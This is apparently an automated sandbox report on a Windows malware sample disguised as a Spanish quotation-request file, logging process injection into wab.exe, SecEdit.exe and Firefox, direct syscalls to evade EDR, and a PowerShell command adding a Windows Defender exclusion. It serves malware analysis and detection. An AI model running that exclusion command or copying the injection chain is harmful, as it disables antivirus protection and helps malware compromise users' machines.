            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F7BA mov eax, dword ptr fs:[00000030h]4_2_0361F7BA
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DF78A mov eax, dword ptr fs:[00000030h]4_2_036DF78A
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E866E mov eax, dword ptr fs:[00000030h]4_2_036E866E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E866E mov eax, dword ptr fs:[00000030h]4_2_036E866E
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A660 mov eax, dword ptr fs:[00000030h]4_2_0365A660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A660 mov eax, dword ptr fs:[00000030h]4_2_0365A660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03659660 mov eax, dword ptr fs:[00000030h]4_2_03659660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03659660 mov eax, dword ptr fs:[00000030h]4_2_03659660
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03652674 mov eax, dword ptr fs:[00000030h]4_2_03652674
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363C640 mov eax, dword ptr fs:[00000030h]4_2_0363C640
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363E627 mov eax, dword ptr fs:[00000030h]4_2_0363E627
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03656620 mov eax, dword ptr fs:[00000030h]4_2_03656620
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03658620 mov eax, dword ptr fs:[00000030h]4_2_03658620
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0361F626 mov eax, dword ptr fs:[00000030h]4_2_0361F626
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362262C mov eax, dword ptr fs:[00000030h]4_2_0362262C
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036F5636 mov eax, dword ptr fs:[00000030h]4_2_036F5636
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E609 mov eax, dword ptr fs:[00000030h]4_2_0369E609
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03651607 mov eax, dword ptr fs:[00000030h]4_2_03651607
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365F603 mov eax, dword ptr fs:[00000030h]4_2_0365F603
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0363260B mov eax, dword ptr fs:[00000030h]4_2_0363260B
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03623616 mov eax, dword ptr fs:[00000030h]4_2_03623616
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03623616 mov eax, dword ptr fs:[00000030h]4_2_03623616
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_03662619 mov eax, dword ptr fs:[00000030h]4_2_03662619
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364D6E0 mov eax, dword ptr fs:[00000030h]4_2_0364D6E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0364D6E0 mov eax, dword ptr fs:[00000030h]4_2_0364D6E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B36EE mov eax, dword ptr fs:[00000030h]4_2_036B36EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B36EE mov eax, dword ptr fs:[00000030h]4_2_036B36EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B36EE mov eax, dword ptr fs:[00000030h]4_2_036B36EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B36EE mov eax, dword ptr fs:[00000030h]4_2_036B36EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B36EE mov eax, dword ptr fs:[00000030h]4_2_036B36EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036B36EE mov eax, dword ptr fs:[00000030h]4_2_036B36EE
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036536EF mov eax, dword ptr fs:[00000030h]4_2_036536EF
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E6F2 mov eax, dword ptr fs:[00000030h]4_2_0369E6F2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E6F2 mov eax, dword ptr fs:[00000030h]4_2_0369E6F2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E6F2 mov eax, dword ptr fs:[00000030h]4_2_0369E6F2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0369E6F2 mov eax, dword ptr fs:[00000030h]4_2_0369E6F2
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A06F1 mov eax, dword ptr fs:[00000030h]4_2_036A06F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036A06F1 mov eax, dword ptr fs:[00000030h]4_2_036A06F1
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036DD6F0 mov eax, dword ptr fs:[00000030h]4_2_036DD6F0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362B6C0 mov eax, dword ptr fs:[00000030h]4_2_0362B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362B6C0 mov eax, dword ptr fs:[00000030h]4_2_0362B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362B6C0 mov eax, dword ptr fs:[00000030h]4_2_0362B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362B6C0 mov eax, dword ptr fs:[00000030h]4_2_0362B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362B6C0 mov eax, dword ptr fs:[00000030h]4_2_0362B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0362B6C0 mov eax, dword ptr fs:[00000030h]4_2_0362B6C0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0365A6C7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_0365A6C7 mov eax, dword ptr fs:[00000030h]4_2_0365A6C7
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E16CC mov eax, dword ptr fs:[00000030h]4_2_036E16CC
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 4_2_036E16CC mov eax, dword ptr fs:[00000030h]4_2_036E16CC
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            .NET source code references suspicious native API functions
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, -------.csReference to suspicious API methods: LoadLibrary(_0600_FD48_06DC_060F(_FBBD_FBC0_FD90_FDD0._FBB3_0614))
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, -------.csReference to suspicious API methods: GetProcAddress(intPtr, _0600_FD48_06DC_060F(_FBBD_FBC0_FD90_FDD0._060A_FDE9_FBB9_FDFF_FBC1))
            Source: z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe, -------.csReference to suspicious API methods: VirtualProtect(procAddress, (uint)array.Length, 64u, out var _FDD1_065A_065F_FD43_0609_FBCF_FDC8)
            Adds a directory exclusion to Windows Defender
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -Force
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -ForceJump to behavior
            Found direct / indirect Syscall (likely to bypass EDR)
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtOpenKeyEx: Direct from: 0x77672B9CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtProtectVirtualMemory: Direct from: 0x77672F9CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtCreateFile: Direct from: 0x77672FECJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtOpenFile: Direct from: 0x77672DCCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtTerminateThread: Direct from: 0x77672FCCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtProtectVirtualMemory: Direct from: 0x77667B2EJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtQueryInformationToken: Direct from: 0x77672CACJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtAllocateVirtualMemory: Direct from: 0x77672BECJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtDeviceIoControlFile: Direct from: 0x77672AECJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtQuerySystemInformation: Direct from: 0x776748CCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtQueryAttributesFile: Direct from: 0x77672E6CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtSetInformationThread: Direct from: 0x77672B4CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtOpenSection: Direct from: 0x77672E0CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtQueryVolumeInformationFile: Direct from: 0x77672F2CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtAllocateVirtualMemory: Direct from: 0x776748ECJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtSetInformationThread: Direct from: 0x776663F9Jump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtReadVirtualMemory: Direct from: 0x77672E8CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtCreateKey: Direct from: 0x77672C6CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtClose: Direct from: 0x77672B6C
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtWriteVirtualMemory: Direct from: 0x7767490CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtAllocateVirtualMemory: Direct from: 0x77673C9CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtDelayExecution: Direct from: 0x77672DDCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtCreateUserProcess: Direct from: 0x7767371CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtQuerySystemInformation: Direct from: 0x77672DFCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtQueryInformationProcess: Direct from: 0x77672C26Jump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtResumeThread: Direct from: 0x77672FBCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtReadFile: Direct from: 0x77672ADCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtAllocateVirtualMemory: Direct from: 0x77672BFCJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtResumeThread: Direct from: 0x776736ACJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtSetInformationProcess: Direct from: 0x77672C5CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtMapViewOfSection: Direct from: 0x77672D1CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtNotifyChangeKey: Direct from: 0x77673C2CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtWriteVirtualMemory: Direct from: 0x77672E3CJump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeNtCreateMutant: Direct from: 0x776735CCJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000 value starts with: 4D5AJump to behavior
            Maps a DLL or memory area into another process
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe protection: execute and read and writeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: NULL target: C:\Windows\SysWOW64\SecEdit.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe protection: execute and read and writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
            Modifies the context of a thread in another process (thread injection)
            Source: C:\Windows\SysWOW64\SecEdit.exeThread register set: target process: 7240Jump to behavior
            Queues an APC in another process (thread injection)
            Source: C:\Windows\SysWOW64\SecEdit.exeThread APC queued: target process: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeJump to behavior
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 401000Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2FE5008Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\Windows Mail\wab.exe"Jump to behavior
            Source: C:\Program Files (x86)\yvHDdoDzTguXRqSVGhynJKHNLRigLVoxaTRdKplBqAbbDD\sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exeProcess created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\SysWOW64\SecEdit.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\SecEdit.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: EProgram Manager
            Source: sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000002.3792078303.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000B.00000000.1468162563.00000000017C1000.00000002.00000001.00040000.00000000.sdmp, sBEHitnKGhZWYiAcpZiUlBvQLEQOwr.exe, 0000000E.00000000.1610181237.0000000001610000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exeQueries volume information: C:\Users\user\Desktop\z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
